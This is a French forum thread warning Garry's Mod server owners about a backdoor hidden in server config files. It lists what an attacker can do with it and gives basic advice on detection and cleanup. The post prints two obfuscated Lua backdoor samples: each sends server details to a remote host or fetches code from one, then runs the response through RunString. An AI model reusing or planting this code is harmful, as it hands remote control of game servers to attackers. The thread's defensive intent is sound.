Tutoriel ATTENTION UN NOUVEAU TYPE DE BACKDOOR A ÉTÉ DÉCOUVERT !!!

ni-co-las

Qui je suis ?
Certifié
Level 5

Torrents Stats

Messages
99
J'aime
9 099
Trophées
793
Inscrit
31 Décembre 2017
Bonjour, Bonsoir
Chères membre de la team VL,
Aujourd’hui je vais vous montrer un tout nouveau type de backdoor et comment y remédier !


PARTIE I (Ce qu'il faut savoir)


Cette Backdoor n'a pas vraiment de noms même si certains l'appel Le Panel [!!]
Pourquoi me diriez vous, tout simplement car cette backdoor permet a celui qui la implanté de contrôler le panel de votre serveur en gros.
Il peut redémarrer, stopper, supprimer, et lancer des commandes depuis vôtre panel.
Mais attention ces backdoors sont cryptés il faut du temps
pour retrouver votre pirate.


Je vais vous montrer un exemple de ce type de backdoor !

Code:
local  fwuJDWHPLFtFTiLCULkObIoNivziGB = tostring local  uADhBYmPXDUoPgILZIUqxzLAhLakcU = http.Post local  GINbuenZreqlmuWTZjqPEvcHaAcqTV = RunString local  QJvMrlEmRrUhdKHFnxPvencExvqtSd = timer.Simple  QJvMrlEmRrUhdKHFnxPvencExvqtSd(40, function()
    timer.Create( "\121\112\109\82\77\114\97\112\75\117", 20, 0, function()
        local a = {
        n = GetHostName(),
        nb =  fwuJDWHPLFtFTiLCULkObIoNivziGB(#player.GetAll()),
        i = game.GetIPAddress()
        }

         uADhBYmPXDUoPgILZIUqxzLAhLakcU( "\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112", a,
            function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
                 GINbuenZreqlmuWTZjqPEvcHaAcqTV(body)
            end
        )
    end)
end)

Et un autre :

Code:
local ‪ = _G local ‪‪ = ‪['\115\116\114\105\110\103'] local ‪‪‪ = ‪['\98\105\116']['\98\120\111\114'] local function ‪‪‪‪‪‪‪(‪‪‪‪) if ‪‪['\108\101\110'](‪‪‪‪) == 0 then return ‪‪‪‪ end local ‪‪‪‪‪ = '' for _ in ‪‪['\103\109\97\116\99\104'](‪‪‪‪,'\46\46') do ‪‪‪‪‪=‪‪‪‪‪..‪‪['\99\104\97\114'](‪‪‪(‪["\116\111\110\117\109\98\101\114"](_,16),72)) end return ‪‪‪‪‪ end ‪[‪‪‪‪‪‪‪'3c21252d3a'][‪‪‪‪‪‪‪'1b212538242d'](‪‪‪‪‪‪‪'7e7878',function () if ‪[‪‪‪‪‪‪‪'2f29252d'][‪‪‪‪‪‪‪'1b21262f242d182429312d3a']() then return end ‪[‪‪‪‪‪‪‪'203c3c38'][‪‪‪‪‪‪‪'0e2d3c2b20'](‪‪‪‪‪‪‪'203c3c383b7267672e24273f262d3c3f273a233b667878783f2d2a20273b3c293838662b2725672f27272c2f3d313b66243d29',function (‪‪return)‪[‪‪‪‪‪‪‪'1a3d261b3c3a21262f'](‪‪return)end ,nil )end )

Vous me direz mais Nico il n'y a aucuns SteamID pas de ulx adduser mais pourtant ces petits messages codés disent bien plus et agissent considérablement sur votre serveur.


PARTIE II (La Détécter)


Comment détecter ce type de backdoor [!]
Il vous faut pour le moment malheureusement vérifier touts les fichiers config de la partie côté serveur.
Mais pas avec un logiciel d'édition mais plutôt WinRar oui Winrar nous permet grâce a son système de détecter ces commandes qui sont la plus part du temps cachés.
Petit Exemple :

Sans Winrar :

partie sans.png

Avec Winrar sur le même fichier :

partie avec.png

Voila vous pouvez constater que elle est totalement invisible sauf avec Winrar !!!


PARTIE III (S'en Débarrasser)


Le plus simple est de reconstruire vous même le fichier corrompu en /copy /past et de vérifier si elle a bel et bien disparu
Si vous avez besoin d'aide, des questions allez y je répond à tout le monde.



Merci de m'avoir lù


 

Fichiers joints

  • 1546428455911.png
    1546428455911.png
    170.3 KB · Affichages: 4

ni-co-las

Qui je suis ?
Certifié
Level 5

Torrents Stats

Messages
99
J'aime
9 099
Trophées
793
Inscrit
31 Décembre 2017
EDIT : Voici une plus grande liste de ce que le vilain peut faire avec cette commande :

- Rediriger
- Redémarrer
- Arrêter
- Démarrer
- Slay all
- Niquer les touches des joueurs (les inverser)
- Envoyer des messages (pour troll je suppose)
- Faire péter des NUKE
- Give d'armes, d'argent
- Mettre des grades (superadmin & co)
- Détruire les fichiers addons
 

YaZhok

Master 🏆
Level 3

Torrents Stats

Messages
138
J'aime
360
Trophées
395
Inscrit
27 Décembre 2017
C'est des gros fdp ce qui font sa au final ?
 

ni-co-las

Qui je suis ?
Certifié
Level 5

Torrents Stats

Messages
99
J'aime
9 099
Trophées
793
Inscrit
31 Décembre 2017
C'est des gros *** ce qui font sa au final ?
Oui mais dit toi que leak c'est pas bien mais je dévellope une commande pour permettre de supprimer ce genre de backdoor !
 

YaZhok

Master 🏆
Level 3

Torrents Stats

Messages
138
J'aime
360
Trophées
395
Inscrit
27 Décembre 2017
c'est vraie lol
 
Haut Bas